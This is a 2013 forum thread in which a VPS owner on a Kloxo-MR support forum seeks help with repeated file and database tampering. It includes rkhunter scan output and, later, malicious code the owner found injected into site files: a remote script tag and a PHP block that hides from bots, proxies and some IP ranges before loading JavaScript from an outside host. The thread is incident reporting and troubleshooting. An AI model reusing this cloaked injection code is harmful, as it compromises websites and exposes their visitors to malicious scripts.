MRatWork Forum by Mustafa Ramadhan

General Discussions => GNU/Linux Helps => Topic started by: costa1988sv on 2013-02-24, 04:14:06

Title: Security Problems
Post by: costa1988sv on 2013-02-24, 04:14:06
Someone is modifying files and mysql database on vps, the first time it modified files and stopped, after from mysql, and now again files, i changed the password, an switched to kloxo-mr, but and not fixed, he can don from my php script that?

[ Rootkit Hunter version 1.4.0 ]

 [1;33mChecking rkhunter version... [0;39m
  This version  : 1.4.0
  Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]

 [1;33mChecking rkhunter data files... [0;39m
  Checking file mirrors.dat [34C[  [1;32mNo update [0;39m ]
  Checking file programs_bad.dat [29C[  [1;32mNo update [0;39m ]
  Checking file backdoorports.dat [28C[  [1;32mNo update [0;39m ]
  Checking file suspscan.dat [33C[  [1;32mNo update [0;39m ]
  Checking file i18n/cn [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/de [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/en [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/zh [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/zh.utf8 [33C[  [1;32mNo update [0;39m ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
         File: /etc/rkhunter.conf
         Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
         Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
         Current size: 37361    Stored size: 37357
         Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
         Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
         /proc/modules output:
         lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
         SSH configuration option 'PermitRootLogin': yes
         Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
         /dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 09:25:52
You can attach files here with warning 'Bourne-Again shell script text executable' and 'perl script text executable'.

I want compare with my own systems.

Better update your Kloxo-MR and then inform here your system with run 'sh /script/sysfo'
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-24, 17:17:01
sh /script/sysfo
sh: /script/sysfo: No such file or directory
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 17:26:46
You need update to Kloxo-MR latest version if didn't found '/script/sysinfo'.
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 17:41:55
Look like content of ifdown and other files as the same as in my servers.

It's as 'false positive'.
Title: Re: Security Problems
Post by: Spacedust on 2013-02-24, 20:01:14
Yes, got the same. Just look for rootkits.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-24, 20:18:09
the rootkit scan is was clean
how i update?
Current Version:   6.5.0.c.2013021802
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 20:25:10
Quote from: "costa1988sv"
the rootkit scan is was clean
how i update?
Current Version:   6.5.0.c.2013021802
Read viewtopic.php?f=4&t=644 (http://forum.mratwork.com/viewtopic.php?f=4&t=644)
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 05:34:44
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
   1. MySQL: mysql-5.0.96-1
   2. PHP: php53u-5.3.21-1.ius.el5
   3. Httpd: httpd-2.2.23-3.el5
   4. Lighttpd: --uninstalled--
   5. Nginx: nginx-1.3.13-1.el5
   6. Qmail: qmail-1.03-1.5.15

D. Php-type (for Httpd/proxy): php-fpm_worker

E. Memory:
                total       used       free     shared    buffers     cached
   Mem:          2048        805       1242          0          0          0
   -/+ buffers/cache:        805       1242
   Swap:            0          0          0

i installed new versioan and i get random 500 error an content encode error
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 05:54:53
switched to event an no more errors
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 07:02:48
in top i have 15+  /usr/libexec/courier-authlib/authdaemond processes

my script is 200% more faster , but wordpress is 25% slower
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 07:39:34
Quote from: "costa1988sv"
in top i have 15+  /usr/libexec/courier-authlib/authdaemond processes

my script is 200% more faster , but wordpress is 25% slower
It's not 'Security Problems'.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 18:40:00
today, he modified a text file, what i use with include
he added at the end
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 18:46:02
and in php files
Code: [Select]
error_reporting(0);
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);
if(strlen($_SERVER['HTTP_REFERER']))
{
    $referer = parse_url($_SERVER['HTTP_REFERER']);
    $referer['host'] = str_replace("www.", "", strtolower($referer['host']));

}
$iptarget = array("x103" , "x223" , "180", "110", "x39" , "114" , "118" , "222"  , "125" ,
"202"  , "203" , "66" , "74" , "182" , "111" , "219" , "27" , "116" ,
"119" , "61" ,"124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
 "87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
 "164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mediapartners-Google" ,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
$rfbad = array("3c21f107.linkbucks.com");
if (  $_SERVER['HTTP_X_FORWARDED_FOR']
   || $_SERVER['HTTP_X_FORWARDED']
   || $_SERVER['HTTP_FORWARDED_FOR']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED']
   || $_SERVER['HTTP_VIA']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED_FOR_IP']
   || $_SERVER['VIA']
   || $_SERVER['X_FORWARDED_FOR']
   || $_SERVER['FORWARDED_FOR']
   || $_SERVER['X_FORWARDED']
   || $_SERVER['FORWARDED']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['FORWARDED_FOR_IP']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['HTTP_PROXY_CONNECTION'])
{
 echo "";
}
elseif (isset($_SERVER['HTTP_REFERER'])){
if (in_array($ip222, $iptarget)) {
echo "";
 } elseif (in_array($useragent111, $ugtarget)){
echo "";

} elseif (!in_array($referer['host'], $rfbad)){
//echo "<script type="text/javascript" src="http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107"></script>";
//echo "<script src="http://yourjavascript.com/26202461412/my-overlay.js"></script>";
echo "<script type="text/javascript" src="http://yourjavascript.com/30131107225/h1.js"></script>";
}
}
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 18:46:39
Questions:

1. Install Kloxo-MR with fresh install or update from Kloxo Official?
2. Attack by hacker for all domains or just certain domain?
3. What app (wordpress and etcetera) for your domain where attacked?
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 19:29:20
So, you mean update from Kloxo to Kloxo-MR?.

If only 1 domains and if more then one domain but still one user that mean something wrong with app code.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 19:35:57
i upgraded to kloxo-mr from kloxo
last night i updated kloxo-mr
the other domains are not too popular, how he can modify files from script? curl, fopen?
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 19:41:43
I will move your thread to 'GNU/Linux Helps' because this thread not related to Kloxo-MR but your php code.

Possible, he have 'backdoor' on your website and or your code not good.

Usually, just enough disable functions for 'exec,passthru,shell_exec,system,proc_open,popen,show_source' (default from Kloxo-MR).
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 20:12:17
I've disabled allow_url_fopen and allow_url_include
thank you for you help, i will install a fresh kloxo-mr when the backup will work